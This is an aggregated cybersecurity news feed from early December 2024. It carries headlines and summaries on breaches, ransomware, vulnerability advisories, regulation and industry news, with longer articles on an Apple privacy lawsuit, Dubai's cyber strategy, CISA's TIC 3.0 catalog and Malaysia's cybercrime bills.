by IT Security Guru
2024-12-03 14:00:00
A Note From the Editor-in-ChiefA change in ownership and what it means for our readers.
by ITPro Today
2024-12-03 14:00:00
CyberheistNews Vol 14 #49 [Heads Up] Bad Actor Uses Deepnude AI Image Generator to Lure And Infect Users
by KnowBe4
2024-12-03 14:00:00
Third-party access: The overlooked risk to your data protection planA recent IBM Cost of a Data Breach report reveals a startling statistic: Only 42% of companies discover breaches through their own security teams. This highlights a significant blind spot, especially when it comes to external partners and vendors. The financial stakes are steep. On average, a data breach affecting multiple environments costs a whopping […] The post Third-party access: The overlooked risk to your data protection plan appeared first on Security Intelligence.
by Security Intelligence
2024-12-03 13:50:10
Introducing Flex 3.0: Elevating Threat Detection in a Dynamic LandscapeIn today's rapidly evolving threat landscape, cyber defense is more crucial than ever. As we introduce Flex 3.0, let's first look at what drives the need for a stronger, smarter approach to detection. Advanced persistent threats (APTs) and sophisticated attacker tactics are now part of the norm. Modern attackers are faster and more creative, taking mere hours to move from initial compromise to reaching their objectives. Yet, detecting an attacker often takes days, sometimes even months. The post Introducing Flex 3.0: Elevating Threat Detection in a Dynamic Landscape appeared first on AttackIQ.
by AttackIQ
2024-12-03 13:36:04
All UPI IDs in India have Predictable Patterns that allow the disclosure of mail IDsRead free …Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-03 13:30:00
'White FAANG' Data Export Attack: A Gold Mine for PII ThreatsWebsites these days know everything about you, even some details you might not realize. Hackers can take advantage of that with a sharp-toothed attack that exploits Europe's GDPR-mandated data portability rules.
by Dark Reading
2024-12-03 13:27:31
Why Phishers Love New TLDs Like .shop, .top and .xyzPhishing attacks increased nearly 40 percent in the year ending August 2024, with much of that growth concentrated at a small number of new generic top-level domains (gTLDs) -- such as .shop, .top, .xyz -- that attract scammers with rock-bottom prices and no meaningful registration requirements, new research finds. Meanwhile, the nonprofit entity that oversees the domain name industry is moving forward with plans to introduce a slew of new gTLDs.
by Krebs on Security
2024-12-03 13:13:58
Alleviating Alert Fatigue with an MSSPBy Euan Carswell, SOC Team Lead at Barrier Networks Everyone can relate to the 7AM alarm call. You can be in a deep sleep when suddenly your ears are met with an incessant pinging that won’t stop until you muster the energy to hit snooze. This is a morning ritual for many. The alarm clock […] The post Alleviating Alert Fatigue with an MSSP appeared first on IT Security Guru.
by IT Security Guru
2024-12-03 13:00:00
Top US Consumer Watchdog Has a Plan to Fight Predatory Data BrokersA new proposal by the Consumer Financial Protection Bureau would use a 54-year-old privacy law to impose new oversight of the data broker industry. But first, the agency must survive Elon Musk.
by WIRED Security News
2024-12-03 12:46:36
Ducks, dinosaurs, and XSS: A little knowledge is a dangerous thing in securitySecurity vulnerabilities are often misunderstood and underestimated. Based on superficial application security knowledge, you might say that cross-site scripting is people putting script tags in form fields. And that’s basically true—but only in the same way as saying ducks are basically dinosaurs. Allow me to explain. The post Ducks, dinosaurs, and XSS: A little knowledge is a dangerous thing in security appeared first on Invicti.
by Invicti
2024-12-03 12:41:02
Apple Faces Privacy Lawsuit: Employee Alleges Invasive Device Monitoring

A current Apple employee has filed a lawsuit against the tech giant, accusing the company of using invasive surveillance tactics on its workers' personal devices. The Apple lawsuit, filed on Sunday evening in California state court, alleges that Apple monitors employees' private iCloud accounts and non-work-related devices without their consent. The plaintiff, Amar Bhakta, has been employed by Apple in the advertising technology sector since 2020. Bhakta claims that Apple's policies force employees to surrender their privacy rights, enabling the company to conduct "physical, video, and electronic surveillance" of workers not just during their working hours, but also when they are off-duty and even after they leave the company. The suit alleges that these practices violate California's strict privacy laws.

Bhakta's legal action points to a broader issue regarding Apple's employment practices, accusing the company of creating policies that infringe on the personal privacy of its employees. The suit outlines a range of policies that allegedly place Apple employees under constant scrutiny, both on and off the job.

The Apple Lawsuit: Invasive Surveillance Tactics

According to the Apple lawsuit, the tech giant has established policies that force employees to integrate their work and personal lives digitally in ways that allow the company to monitor their actions beyond the workplace. One of the central issues raised in the lawsuit is Apple's requirement that employees use Apple-made devices for work purposes. This stipulation, the suit argues, often results in workers using their personal Apple devices, which are connected to their personal iCloud accounts. According to Semafor, the lawsuit further claims that by using their own devices for work, employees unknowingly grant Apple the ability to access virtually any data on those devices.
This includes emails, photos, videos, and other personal information. Apple’s internal privacy policy allegedly states that if an employee uses their personal iCloud account on an Apple-managed device, the company can search and access any data stored on that device, including real-time location data. This level of access has raised concerns among former Apple employees, who have previously complained about the company’s ability to monitor personal information. Apple’s Response and Legal Representation In response to the Apple lawsuit, the firm has strongly denied the allegations, insisting that the company upholds its employees'' rights to privacy. Every employee has the right to discuss their wages, hours, and working conditions, and this is part of our business conduct policy, which all employees are trained on annually,"" the company said in a statement. Bhakta is represented by Chris Baker of Baker Dolinko & Schwartz, alongside Jahan Sagafi from Outten & Golden. Both attorneys have experience in handling high-profile cases against large technology companies. Baker, in particular, has filed several lawsuits against tech giants concerning allegedly unlawful employment practices. Impact on Employee Freedom and Privacy The lawsuit against Apple also highlights the restrictive nature of the company''s policies regarding digital privacy. The suit claims that Apple actively discourages employees from maintaining separate work and personal iCloud accounts. Instead, employees are encouraged to use a single iCloud account that merges their work and personal lives, thereby granting Apple more access to their private information. This digital integration, according to the lawsuit, creates an environment in which Apple can monitor employees’ personal activities even when they are off the clock. 
Employees are said to have limited options to avoid this surveillance, with the only alternative being to use a work-owned device and a separate iCloud account exclusively for work purposes. However, the suit asserts that Apple discourages this practice. Legal Action Under California’s Labor Laws Bhakta’s lawsuit was filed under the California Private Attorneys General Act (PAGA), which permits employees to sue on behalf of the state for labor violations. If the court finds Apple guilty of violating state labor laws, the company could be subjected to penalties, which would be multiplied by the number of employees affected by the alleged surveillance. This lawsuit against Apple highlights ongoing concerns over digital privacy in the workplace. As more employees find themselves bound by the company''s restrictive policies, the case has the potential to set a precedent for how tech companies handle employee surveillance and personal privacy. With the backing of California state law, Bhakta’s legal team aims to hold Apple accountable for any violations, especially if the company''s actions have impacted a large number of its employees.
by The Cyber Express
2024-12-03 12:41:00
Flipper Zero goes retro with this cool limited-edition transparent version
If you want one, you'd better act fast.
by ZDNET Security
2024-12-03 12:40:00
LastPass adds passkey support for free and premium users
LastPass users can take another step toward a password-less world. Here's how to activate the beta feature now.
by ZDNET Security
2024-12-03 12:37:30
DESC Leads Dubai’s Journey to Becoming the World’s Safest Digital City
Overview
Dubai is making significant strides in integrating advanced technologies while emphasizing strong cybersecurity frameworks. A recent study by the World Economic Forum (WEF), titled "Navigating Cyber Resilience in the Age of Emerging Technologies," highlights how the city is utilizing technologies such as artificial intelligence (AI), blockchain, quantum computing, and smart city solutions across critical sectors. The Dubai Electronic Security Center (DESC) plays a central role in supporting the secure adoption of these emerging technologies. Initiatives such as the Dubai Cyber Security Strategy and the UAE National Strategy for Artificial Intelligence 2031, along with policies like the Dubai AI Security Policy and autonomous vehicle security standards, aim to balance innovation with a focus on digital security. This blog delves into DESC's contributions, Dubai’s cybersecurity strategies, and the city’s efforts to enhance cyber resilience and enable secure digital transformation.

The Role of DESC in Dubai’s Cybersecurity Strategy
The Dubai Electronic Security Center (DESC) is at the heart of Dubai’s digital transformation. As a key player in Dubai’s Cyber Security Strategy, DESC focuses on securing digital assets, fostering innovation, and establishing Dubai as a leading secure digital hub. His Excellency Yousuf Hamad Al Shaibani, CEO of DESC, highlighted the center’s proactive measures, saying, “The Center continues to coordinate with governmental, regional, and international entities to study the security requirements of modern and emerging technologies and set standards and controls that ensure their safe adoption across various sectors.” DESC has introduced multiple initiatives to ensure the secure implementation of emerging technologies:
- Dubai AI Security Policy: A framework for safe use of AI technologies across sectors.
- Autonomous Vehicle Security Specification: The first of its kind globally, providing security standards for self-driving vehicles.
- RZAM Cybersecurity Application: A real-time solution leveraging AI to protect internet users from malicious websites and phishing attacks.
These policies underscore Dubai’s efforts to create a secure environment for the adoption of advanced technologies.

Advancing Emerging Technologies
Dubai’s leadership in cybersecurity is closely aligned with the UAE National Strategy for Artificial Intelligence 2031. This strategy, combined with substantial investments in technologies such as quantum computing, 5G communications, and the Internet of Things (IoT), is designed to drive innovation while maintaining robust digital safeguards. For example, DESC has been instrumental in supporting Dubai’s Self-Driving Transport (SDT) Strategy. The SDT Strategy aims to convert 25% of Dubai’s total transportation to self-driving vehicles by 2030. To achieve this, DESC recently published a study on connected vehicles, highlighting the security specifications required to mitigate cyber risks in IoT-enabled transport systems.

The Economic Impact of AI
Artificial intelligence is central to Dubai’s digital transformation efforts. The WEF report estimated that AI will contribute USD 320 billion to the UAE economy by 2030. In line with this, DESC issued a detailed study examining AI’s potential across various sectors in Dubai. This study analyzed:
- AI’s Economic Contributions: Estimating how AI can drive Dubai’s economic growth.
- Ethical and Societal Considerations: Exploring the implications of widespread AI adoption.
- Risk Mitigation: Identifying challenges and solutions for safe AI integration.
- Stakeholder Collaboration: Promoting partnerships to enhance AI research and application.
These efforts are part of a broader vision to position Dubai as a global hub for AI research, development, and implementation.

Global Partnerships and Regulatory Frameworks
DESC has also been instrumental in establishing partnerships with public and private stakeholders at both local and international levels. By collaborating with research institutions and global technology leaders, Dubai is developing regulatory frameworks to safely integrate cutting-edge technologies. These partnerships are crucial in fostering an environment where innovation can thrive without compromising security. Policies such as the Dubai AI Security Policy and the autonomous vehicle security standards reflect the city’s commitment to balancing innovation with cybersecurity.

Building a Resilient Digital Infrastructure
Dubai’s success in integrating new technologies is rooted in its digital infrastructure and forward-looking strategies. The Dubai Cyber Security Strategy serves as a guiding framework for ensuring the resilience and reliability of digital systems. By focusing on key areas like secure IoT adoption, AI governance, and blockchain implementation, DESC is driving Dubai’s vision of a smart and secure city. These efforts are complemented by national initiatives such as the UAE’s investments in advanced communication technologies like 5G and quantum computing.

The Future of Cyber Resilience in Dubai
Dubai’s approach to cybersecurity offers valuable lessons for other cities and nations seeking to embrace emerging technologies. With DESC leading the charge, Dubai is not only addressing present-day challenges but also preparing for future risks associated with digital transformation. Its comprehensive strategies and global collaborations ensure that innovation is securely integrated into all aspects of life.

References:
https://www.desc.gov.ae/world-economic-forum-study-highlights-descs-innovative-efforts-in-securing-emerging-technologies/
by CYBLE
2024-12-03 12:08:21
Inside Akira Ransomware’s Rust Experiment
Executive Summary
Introduction
Earlier this year, Talos published an update on the ongoing evolution of Akira ransomware-as-a-service (RaaS) that has become one of the more prominent players in the current ransomware landscape. According to this update, for a while in early 2024, Akira affiliates experimented with promoting a new cross-platform variant of the ransomware called […]
by Check Point Research
2024-12-03 11:25:04
CISA Releases Updated TIC 3.0 Security Capabilities Catalog (SCC) Version 3.2
Overview
The Cybersecurity and Infrastructure Security Agency (CISA) has published the updated version of the Trusted Internet Connections (TIC) 3.0 Security Capabilities Catalog (SCC) version 3.2. This new release incorporates essential updates based on the latest National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) Version 2.0, ensuring that TIC continues to adapt to modern technologies. The SCC provides a comprehensive set of deployable security controls, capabilities, and best practices to assist federal agencies in implementing secure network environments. With this update, the catalog enhances the guidance for the secure implementation of technology solutions and ensures agencies remain compliant with cybersecurity standards.

The TIC 3.0 SCC serves as a foundational guide for federal agencies, enabling them to meet stringent security requirements across various computing environments. It offers a thorough catalog of security capabilities designed to protect federal information and mitigate cyber risks. By leveraging the latest NIST CSF mappings, the catalog helps agencies strengthen their cybersecurity postures through a series of strategic and technical security measures. One of the important aspects of the TIC 3.0 SCC Version 3.2 is its alignment with the NIST CSF, which is structured around the core functions of Govern, Identify, Protect, Detect, Respond, and Recover. This mapping ensures that the security controls and capabilities within the catalog are aligned with best practices in risk management, incident detection, and threat response.

The Role of the Security Capabilities Catalog
The SCC is an important resource that assists agencies in applying best practices and risk management principles to protect information in various computing scenarios. This includes guidance for different networking environments, such as cloud, mobile, and traditional on-premises infrastructure. As the federal government continues to transition to more decentralized and cloud-based environments, the TIC 3.0 SCC helps agencies ensure that they maintain security measures across their entire IT ecosystem. Agencies are encouraged to apply guidance within the SCC to identify potential risks and implement compensating controls when necessary. These controls address potential gaps or residual risks that might remain after deploying the recommended security capabilities. Additionally, CISA emphasizes the importance of collaborating with vendors to ensure that security solutions are adequately implemented, configured, and maintained. This collaboration ensures that agencies can fulfill security requirements and remain protected.

Security Objectives of Security Capabilities Catalog TIC 3.0
The TIC program outlines a set of security objectives aimed at mitigating risks and securing federal data as it moves through various trust zones. As federal agencies increasingly leverage cloud and mobile services, TIC’s security objectives are designed to provide consistent and scalable protections regardless of where the data resides or how it is transmitted. The objectives of TIC 3.0 include:
- Manage Traffic: This objective focuses on observing and filtering data connections to ensure they align with authorized activities. It also applies the principle of least privilege and default-deny policies.
- Protect Traffic Confidentiality: This ensures that only authorized parties can access data in transit, protecting the confidentiality of sensitive government communications.
- Protect Traffic Integrity: The integrity of data during transmission is critical to prevent and detect any alterations that could indicate a cyberattack or data breach.
- Ensure Service Resiliency: With cyber threats constantly evolving, the ability to ensure the continuous operation of critical services and applications is a central focus of TIC 3.0.
- Ensure Effective Response: This objective encourages agencies to establish processes for timely responses to cybersecurity incidents, with a focus on adapting security policies as new threats emerge.
These objectives are designed to align with the functions of the NIST Cybersecurity Framework, ensuring that TIC 3.0 offers a comprehensive approach to securing federal networks.

Universal and PEP Security Capabilities
The SCC is divided into two main sections: Universal Security Capabilities and PEP (Policy Enforcement Point) Security Capabilities. These capabilities are critical in securing federal networks and ensuring agencies can manage cybersecurity risks efficiently.

Universal Security Capabilities
Universal security capabilities are high-level principles that are applicable to all federal agencies, irrespective of their individual use cases. These capabilities help agencies implement broad cybersecurity measures that apply to enterprise-level risks. Some of the key universal security capabilities include:
- Backup and Recovery: Ensures data and configurations are backed up and can be quickly restored after an incident, failure, or corruption.
- Central Log Management with Analysis: This function collects, stores, and analyzes telemetry to support security analysis and detect malicious activity.
- Incident Response Planning and Handling: Helps agencies prepare for and respond to cyberattacks, ensuring that recovery and detection measures are in place.
- Least Privilege: Grants minimum resources and authorizations necessary for entities to perform their functions, reducing exposure to potential threats.
- Patch Management: Identifies, acquires, installs, and verifies patches to secure systems from known vulnerabilities.
These capabilities are mapped to the NIST CSF, providing a comprehensive set of actions for each area. This ensures that agencies can implement the appropriate security measures based on the severity of the risk.

PEP Security Capabilities
The PEP capabilities focus on specific technical implementations and are more granular in nature. These capabilities support the TIC 3.0 security objectives and are aligned with Zero Trust Architectures. For example, the following PEP security capabilities are critical in network environments:
- Anti-malware: Detects and quarantines malicious code that could compromise the integrity of the network.
- Network Segmentation: Divides networks to reduce attack surfaces and limit the potential spread of cyber threats.
- Multi-factor Authentication: Adds an additional layer of authentication, ensuring that only authorized users gain access to sensitive data.
These PEP capabilities can be adapted depending on the agency’s specific requirements, such as the use of cloud, email, web, or network security solutions.

Conclusion
As cybersecurity threats become increasingly sophisticated, the TIC 3.0 SCC will continue to adapt to new changes. The document is periodically updated to reflect new security practices and technologies. Agencies are encouraged to actively engage with CISA and vendors to ensure that their implementations remain effective. The TIC 3.0 SCC version 3.2 is a crucial update in protecting federal networks. As agencies adopt more complex computing environments, the need for new and upgraded security measures like the Security Capabilities Catalog, Trusted Internet Connections, and TIC frameworks grows. This updated catalog equips agencies with the tools to understand these challenges, ensuring the protection of sensitive information while maintaining secure operations.

References
https://www.cisa.gov/news-events/news/updated-tic-30-security-capabilities-catalog-scc-v32
https://www.cisa.gov/sites/default/files/2024-11/TIC%203.0%20Security%20Capabilities%20Catalog508%20v3.2%20%28Volume%203%29.pdf
https://www.cisa.gov/sites/default/files/publications/CISA_TIC%203.0%20Vol.%202%20Reference%20Architecture.pdf
by CYBLE
2024-12-03 11:22:47
ENGlobal IT systems impacted by ransomware attack
The attack marks at least the third disruptive cyberattack impacting energy sector providers based in Texas since August.
by Cybersecurity Dive
2024-12-03 10:53:00
Horns&Hooves Campaign Delivers RATs via Fake Emails and JavaScript Payloads
A newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT. The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer
by The Hacker News
2024-12-03 10:00:00
State of IT Report 2025: Security and AI Drive Growth Despite Economic Pressures
Spiceworks' 2025 State of IT report shows increased tech spending amid rising costs and AI investments.
by ITPro Today
2024-12-03 10:00:00
US agency proposes new rule blocking data brokers from selling Americans’ sensitive personal data
The U.S. consumer protection agency said it's closing the loophole to block the "widespread evasion" of federal law by data brokers. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-03 09:49:43
US government contractor ENGlobal says operations are ‘limited’ following cyberattack
ENGlobal Corporation, a provider of engineering and automation services to the U.S. energy sector and federal government, says it has restricted access to its IT systems following a cyberattack, limiting the company to essential business operations only. In an 8-K filing with the SEC on Monday, Texas-based ENGlobal said it became aware of a “cybersecurity […]
by TechCrunch
2024-12-03 09:00:00
Note from the Editor-in-Chief
A change in ownership and what it means for our readers.
by Cybersecurity Dive
2024-12-03 08:31:00
UK cyber chief warns country is at an inflection point as digital threats rise
In his first major speech, NCSC CEO Richard Horne said state linked and criminal threat groups are working to undermine the nation’s reliance on technology.
by Cybersecurity Dive
2024-12-03 00:00:00
One Year of Falcon Go: Transforming Cybersecurity for Small Businesses
by CrowdStrike
2024-12-03 00:00:00
2024 State of Threat Intelligence Infographic
Discover key insights from 550+ cybersecurity experts on threat intelligence trends, spending, and strategies in our 2024 infographic. Learn more.
by Recorded Future
2024-12-03 00:00:00
Discovering a Deserialization Vulnerability in LINQPad
Like most red teamers, I spend quite a lot of time looking for novel vulnerabilities that could be used for initial access or lateral movement. Recently, my focus has been on deserialization vulnerabilities in .NET…
by TrustedSec
2024-12-03 00:00:00
ZDI-24-1642: Linux Kernel nftables Type Confusion Information Disclosure Vulnerability
This vulnerability allows local attackers to disclose sensitive information on affected installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 3.8. The following CVEs are assigned: CVE-2024-42070.
by Zero Day Initiative Advisories
2024-12-03 00:00:00
ZDI-24-1641: Intel Computing Improvement Program PyInstaller Local Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Intel Computing Improvement Program. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2023-49797.
by Zero Day Initiative Advisories
2024-12-02 23:59:00
Last Week in Security (LWiS) - 2024-12-02
Windows LPE (@SecuriTeam_SSD), Nighthawk 0.3.3 (@MDSecLabs), Advanced Cobalt Strike Usage (@_RastaMouse), Webcam LED control (@andreyknvl), AI/ML attacks (@olivier_boschko), and more!
by Bad Sector Labs
2024-12-02 23:00:10
Threat Assessment: Howling Scorpius (Akira Ransomware)
Howling Scorpius, active since 2023, uses Akira ransomware to target businesses globally, employing a double-extortion strategy and upgrading tools regularly.
by Palo Alto Networks - Unit42
2024-12-02 21:52:54
'Bootkitty' First Bootloader to Take Aim at Linux
Though it's still just a proof of concept, the malware is functional and can evade the Secure Boot process on devices from multiple vendors.
by Dark Reading
2024-12-02 21:10:00
A familiar name makes the CRN’s Women on the Rise List
The annual CRN Women on the Rise List was posted recently. See which team member from Barracuda made the list this year.
by Barracuda
2024-12-02 20:58:33
Interpol Cyber-Fraud Action Nets More Than 5K Arrests
Chalk up another win for global cooperation among law enforcement, this time targeting seven types of cyber fraud, including voice phishing and business email compromise.
by Dark Reading
2024-12-02 20:57:29
AWS Launches New Incident Response Service
AWS Security Incident Response will help security teams defend their organizations from account takeovers, breaches, ransomware attacks, and other types of security threats.
by Dark Reading
2024-12-02 20:15:00
Sysdig and Cribl: Unleash the true power of cloud security data
Cloud security operates on a different paradigm compared to traditional IT security. For example, it involves multiple contextual layers such...
by Sysdig
2024-12-02 19:42:53
China Threat Actor Targets Individuals and Entities in Japan Via Spear Phishing Campaign
Researchers at Trend Micro warn that the China-aligned threat actor Earth Kasha has launched a new spear phishing campaign targeting individuals and organizations in Japan.
by KnowBe4
2024-12-02 19:42:51
The Cruel Twist: When Fake Firing Leads to Real Hacking
Cybercriminals are constantly evolving their tactics to exploit our vulnerabilities. A recent phishing campaign has taken this to a new low, preying on people's fear of job loss to trick them into compromising their own security.
by KnowBe4
2024-12-02 19:41:00
NCSC boss calls for ‘sustained vigilance’ in an aggressive world
by ComputerWeekly
2024-12-02 19:41:00
A Guide to Securing AI App Development: Join This Cybersecurity Webinar
Artificial Intelligence (AI) is no longer a far-off dream—it’s here, changing the way we live. From ordering coffee to diagnosing diseases, it’s everywhere. But while you’re creating the next big AI-powered app, hackers are already figuring out ways to break it. Every AI app is an opportunity—and a potential risk. The stakes are huge: data leaks, downtime, and even safety threats if security
by The Hacker News
2024-12-02 19:31:00
SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan
Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While
by The Hacker News
2024-12-02 19:13:41
An Apple employee is suing the company over monitoring employee personal devices
An Apple employee sued the tech company as part of an effort to limit the visibility employers have on personal devices used for work.
by TechCrunch
2024-12-02 19:03:08
Name That Edge Toon: Shackled!
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 gift card.
by Dark Reading
2024-12-02 18:40:19
Poland arrests former spy chief in Pegasus spyware probe
The former head of Poland’s internal security agency Piotr Pogonowski was forced to appear in front of a parliamentary committee investigating the alleged abuse of Pegasus spyware in the country.
by TechCrunch
2024-12-02 18:27:56
🐝 Hive Five 200 - A Career Ending Mistake
Mutation XSS Explained, How to Best Start Bug Bounty to Earn $100k in 1 year, Getting started with AI: Good enough prompting, and more...
by Hive Five
2024-12-02 17:50:44
Indian online ID verification firm Signzy confirms security incident
The Indian identity verification service, used by millions of customers, has confirmed a cybersecurity incident.
by TechCrunch
2024-12-02 17:42:32
Does Your Company Need a Virtual CISO?
With cybersecurity talent hard to come by and companies increasingly looking for guidance and best practices, virtual and fractional chief information security officers can make a lot of sense.
by Dark Reading
2024-12-02 17:40:49
Russian government confirms rare criminal charges against ransomware hacker
Russian media reports say that the accused hacker is on the FBI's most wanted list.
by TechCrunch
2024-12-02 17:36:11
New Sherlocks updates: Academy recommendations, CPE credits (and more!)
Ready for a more rewarding dive into your blue team investigations? Well, we have made new updates to Sherlocks that will give you momentum and a bonus to time well spent.
by Hack The Box Blog
2024-12-02 16:50:11
Industry Moves for the week of December 2, 2024 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of December 2, 2024. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2024-12-02 16:44:00
THN Recap: Top Cybersecurity Threats, Tools and Tips (Nov 25 - Dec 1)
Ever wonder what happens in the digital world every time you blink? Here's something wild - hackers launch about 2,200 attacks every single day, which means someone's trying to break into a system somewhere every 39 seconds. And get this - while we're all worried about regular hackers, there are now AI systems out there that can craft phishing emails so convincingly that even cybersecurity
by The Hacker News
2024-12-02 16:33:20
2 UK Hospitals Targeted in Separate Cyberattacks
Alder Hey Children's Hospital got hit with a ransomware attack, while the nature of an incident at Wirral University Teaching Hospital remains undisclosed.
by Dark Reading
2024-12-02 16:00:00
Intro to Data Analytics Using SQL
In this video, Ethan Robish discusses the fundamentals and intricacies of data analytics using SQL.
by Black Hills Information Security
2024-12-02 15:57:00
[NEW PRODUCT]: KnowBe4’s AIDA: Revolutionizing Security Awareness Training with AI-Powered Automation and Personalization
Technological advances in artificial intelligence (AI) are only making the ongoing problem of social engineering worse.
by KnowBe4
2024-12-02 15:16:00
8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play
Over a dozen malicious Android apps identified on the Google Play Store that have been collectively downloaded over 8 million times contain malware known as SpyLoan, according to new findings from McAfee Labs. "These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions, which
by The Hacker News
2024-12-02 15:00:17
Rhadamanthys Stealer Analysis for Detection Opportunities
Written by ARC Labs contributor, Shannon Mong
Threat Overview
Binary Defense ARC Labs’ threat researchers recently dissected a Rhadamanthys Stealer infection chain to uncover detection opportunities that defenders can leverage to strengthen organizational security. In this analysis, we provide general detection guidance and actionable queries for detecting Rhadamanthys Stealer.
Recent Campaign Insights
Rhadamanthys Stealer surfaced on underground […]
by Binary Defense
2024-12-02 15:00:00
Incident Response Playbooks: Are You Prepared?
The playbooks that accompany your incident response plan provide efficiency and consistency in responses, help reduce downtime and dwell time, and can be a cost-saving and reputational-saving measure for your organization.
by Dark Reading
2024-12-02 14:00:00
Are You Being Tracked by an AirTag? Here’s How to Check
If you’re worried that one of Apple’s trackers is following you without consent, try these tips.
by WIRED Security News
2024-12-02 13:40:02
BianLian's Shape-Shifting Tactics: From Encryption to Pure Extortion
Introduction
BianLian Ransomware
Cyber threats are escalating in frequency and sophistication, with BianLian emerging as a significant player targeting critical sectors such as healthcare, manufacturing, and professional services. Since its emergence in 2022, BianLian has demonstrated remarkable adaptability, shifting from a double-extortion model—where data is encrypted and exfiltrated—to a data-theft extortion strategy [1]. This evolution reflects the group's responsiveness to defensive measures and industry trends, notably following Avast's public release of a free decryptor in January 2023, which undermined their encryption-based ransom demands.
by Picus Security
2024-12-02 13:37:48
Microsoft Boosts Device Security With Windows Resiliency Initiative
Microsoft is readying a new release of Windows in 2025 that will have significant security controls, such as more resilient drivers and a "self-defending" operating system kernel.
by Dark Reading
2024-12-02 13:10:36
Cloud security specialist Upwind confirms it raised $100M at a $900M valuation
In November, TechCrunch broke the news that cybersecurity startup Upwind was getting a lot of inbound interest to raise money on a big valuation. Now, we can confirm that the deal is done: Upwind has closed a Series A round of $100 million. The round values it at $900 million post-money. Craft Ventures, the investment […]
by TechCrunch
2024-12-02 12:48:14
Ex-NBA athlete Omri Casspi launches $60M fund targeting cybersecurity, cloud infra and AI
Former NBA athlete Omri Casspi has raised $60 million for his latest venture fund, Swish Ventures, which will invest in early-stage cybersecurity, cloud infrastructure, and AI startups. The fund plans to back 10 companies, and will invest $5 million to $7 million per deal. Swish Ventures is Casspi’s second fund following the launch of Sheva […]
by TechCrunch
2024-12-02 12:38:39
Retail outages drag into second week after Blue Yonder ransomware attack
A ransomware attack on supply chain software giant Blue Yonder continues to cause disruption to the company’s customers, almost two weeks after the outage first began. In a brief update to its cybersecurity incident page on Sunday, Arizona-based Blue Yonder said it is making “good progress” in its recovery from the attack, which hit its […]
by TechCrunch
2024-12-02 12:37:56
Malaysia’s Fight Against Cybercrime: Two New Bills Tabled in Parliament
Overview
The Madani Government has taken a significant step toward ensuring online safety by tabling two crucial bills in the Dewan Rakyat on Monday. This development marks a pivotal moment in Malaysia's efforts to combat cybercrime and modernize outdated cyber laws that were enacted nearly three decades ago. Communications Minister Fahmi Fadzil tabled the Communications and Multimedia (Amendment) Bill 2024 and the Malaysian Communications and Multimedia Commission (Amendment) Bill 2024 for their first reading in Parliament. These legislative changes highlight the government's determination to strengthen Malaysia’s legal framework against cybercrime while promoting a safer digital environment for its citizens.
Why these new Bills are necessary
The internet has evolved dramatically over the past 26 years, bringing both incredible opportunities and risks. As cyber threats become more advanced, outdated laws struggle to provide adequate protection for users, businesses, and institutions. From online scams and fraudulent activities to harassment and the misuse of personal data, the need for strong cyber laws has never been more pressing. The tabling of these two bills comes in response to rising online threats and the necessity to adapt Malaysia’s legal framework to the realities of today’s digital age. Minister Fahmi emphasized that these amendments aim to close gaps in existing legislation, ensuring that Malaysia stays ahead in its fight against cybercrime.
Key Provisions in the Communications and Multimedia (Amendment) Bill 2024
The Communications and Multimedia (Amendment) Bill 2024 focuses on updating Act 588 to address new challenges in the digital realm. Below are the significant proposed changes:
Expanded Definition of Harassment and Fraud: Subsection 233(1) will now include the phrase “harass or commit an offense involving fraud or dishonesty against any person”, broadening the scope of punishable offenses under the act. This change ensures that fraudulent online activities, in addition to harassment, are explicitly covered under the law.
Prohibition of Unsolicited Commercial Messages: Clause 92 introduces a new Section 233a, which prohibits the sending of unsolicited commercial electronic messages. This measure aims to combat spam and phishing schemes, which often serve as gateways for more serious cybercrimes.
Disclosure of Communications Data: Clause 112 introduces Section 252b, empowering police or authorized officers to compel the disclosure of communications data from individuals in control of a communications system. This change seeks to enhance law enforcement’s ability to investigate and respond to cybercrimes swiftly.
Key Provisions in the Malaysian Communications and Multimedia Commission (Amendment) Bill 2024
The Malaysian Communications and Multimedia Commission (MCMC) (Amendment) Bill 2024, meanwhile, focuses on strengthening the capabilities and functions of the MCMC under Act 589. Notable amendments include:
Expansion of MCMC’s Functions: Clause 5 proposes an amendment to Section 16, enabling the MCMC to review and audit information provided by licensees. This includes auditing the activities of licensees or service providers as determined by the commission, ensuring better oversight and accountability.
New Definitions: Clause 2 amends Section 3 to introduce new definitions for “chief executive officer” and “communications system” while also refining the definition of “chairman.” These updates provide clearer guidelines for roles and responsibilities within the MCMC.
Increased Contract Value Limit: Clause 13 proposes an amendment to Section 45, raising the contract value limit the commission can enter without ministerial or financial concurrence from RM5 million to RM10 million. This change is expected to streamline administrative processes and enhance the MCMC’s operational efficiency.
Implications of these Bills
The amendments to these two critical acts represent a comprehensive approach to tackling cybercrime. Key implications include:
Enhanced Legal Protections: The laws provide stronger safeguards for individuals and businesses by explicitly addressing harassment, fraud, and spam.
Modernized Oversight: Changes to the MCMC’s functions and financial thresholds will enable the commission to better regulate and oversee the telecommunications and multimedia sectors.
However, some of these changes, particularly the expanded search powers, may raise concerns about privacy and potential misuse of authority. Balancing security and personal freedoms will be crucial as the bills are debated.
A Critical Moment for Cybersecurity in Malaysia
